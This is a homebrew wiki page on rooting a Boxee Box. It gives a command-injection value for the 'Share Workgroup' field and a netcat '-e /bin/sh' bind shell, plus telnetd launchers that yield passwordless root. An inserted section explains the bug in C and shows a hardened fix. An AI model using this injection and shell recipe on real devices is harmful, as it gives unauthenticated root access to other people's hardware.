Telnetd

Methods for starting a raw sh shell (telnet-like) on the latest firmware

#Get a USB stick and copy nc (netcat) from e.g. BackTrack onto it
#Plug the USB stick into your Boxee Box

Any USB disk mounts automatically under /tmp/mnt/ID, and a symlink /media/LABEL is also created pointing at the mount point,
i.e. /media/My_pendrive -> /tmp/mnt/F56-A64-74R
You can use this symlink instead of the mount point and skip the next three steps.

#You need to find out where it is mounted, so go to http://yourboxeebox:8080
#Click "Get latest logs", open the log file and look for "storage"
#There you can see the USB drive being mounted at e.g. /tmp/mnt/123-123
#Go to your Boxee Box Settings > Network and choose Servers
#Choose "Share Workgroup"
#Type in ;cp /tmp/mnt/123-123/nc /tmp;
#Go back out to the main settings menu
#Go back into "Share Workgroup"
#Type /tmp/nc -lvp 31337 -e /bin/sh
#Go back; the Boxee will freeze. That means it has executed nc and is waiting for netcat to exit.
#In BackTrack, Windows, or whatever you have, run
#nc yourboxeehost 31337
#You will see a blank prompt; try ls -al

bin
buildinfo
data
dev
download
etc
lib
linuxrc
media
mnt
opt
proc
sbin
share
sys
tmp
usr
var
version

#Done

Would like to thank the original author of the command execution bug, GTVHacker. Thanks for a fun Defcon!
Br,
Acidgen
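The "Share Workgroup" field works as an injection point because the value is evidently handed to a shell unescaped, so a ';' ends the vendor's command and the rest of the string runs as root. The following is an added illustration in C of that bug class, not Boxee's own code: the smbclient invocation, the function names and the 15-character NetBIOS limit are assumptions. It places the vulnerable string-splicing pattern next to a hardened version that allowlists the value and passes it as a single argv element with no shell in between.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

#define WG_MAX 15  /* NetBIOS workgroup names are at most 15 characters */

/* Allowlist check: 1..15 ASCII letters, digits, '-' or '_'.  Shell
 * metacharacters (';', '|', '`', '$', quotes, whitespace) never pass. */
int validate_workgroup(const char *wg)
{
    size_t len = wg ? strlen(wg) : 0;
    if (len == 0 || len > WG_MAX)
        return 0;
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)wg[i];
        if (!isalnum(c) && c != '-' && c != '_')
            return 0;
    }
    return 1;
}

/* Vulnerable pattern (hypothetical, not the real Boxee code): the setting is
 * spliced into a line meant for system(3), so ';' ends the intended command
 * and whatever follows runs with the daemon's privileges (root here). */
const char *unsafe_command(const char *wg)
{
    static char cmd[256];
    snprintf(cmd, sizeof cmd, "smbclient -L localhost -W %s", wg);
    return cmd;
}

/* Hardened pattern: allowlist the value, then pass it as one argv element to
 * execvp(), so no shell parses it.  Returns -1 when the value is rejected or
 * the child cannot run, else the child's exit status (127 = no smbclient). */
int safe_lookup(const char *wg)
{
    if (!validate_workgroup(wg)) return -1;
    char *argv[] = {"smbclient", "-L", "localhost", "-W", (char *)wg, NULL};
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        execvp(argv[0], argv);
        _exit(127);  /* exec failed; do not return into the parent's code */
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status)) return -1;
    return WEXITSTATUS(status);
}
```

With this check in place the ;cp ... ; value typed into the field above is rejected before any command is built, which is the fix a firmware update would need.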

Methods for Starting Telnet

!!! Neither method seems to work in Firmware 1.0.1.16319 or higher !!!

UnBoxed App

#Add the repository http://erikkristensen.com/boxee/
#Launch the "UnBoxed" app.
#Click "Start Telnet"

#Add the UnBoxed mirror to get a working version of the app without the notice (the one above just says that it no longer works).
#Add the repository http://infinityoverzero.com/bbox/rep/
#Launch the "UnBoxed" app.

Launcher App (Method 2)

#Add the repository dir.fuzzthed.com
#Start the "Launcher" app.
#Create an application.
#* Name the application Start Telnet.
#* Link should be "/etc/init.d/telnetd start" - include the quotes.
#Create another application.
#* Name the application Stop Telnet.
#* Link should be "/etc/init.d/telnetd stop" - include the quotes.

Launching "Start Telnet" should allow you to telnet to the box - you should be automatically logged in as root with no password prompt.

Launching the applications appears to do nothing, but will start or stop the telnet daemon behind the scenes.

Caveats

Some display and formatting issues have been noticed with PuTTY, but "telnet" under Linux works fine. Use the "raw" mode in PuTTY and specify port 23 instead of using the "Telnet" default. This still has some display issues, but works well enough.

Issues

Normally we'd create a symlink in /dev/rc3.d/ to /etc/init.d/telnetd to start it on boot, but the root filesystem is read-only (it is a rootfs filesystem) and can't be remounted read-write.

This does start (or stop) a root shell with no password. The root partition is read-only, but this could still pose a security risk, depending on your network. You may want to stop the Telnet daemon (or reboot) when you're done experimenting.

Unless otherwise stated, the content of this page is licensed under Creative Commons Attribution-ShareAlike 3.0 License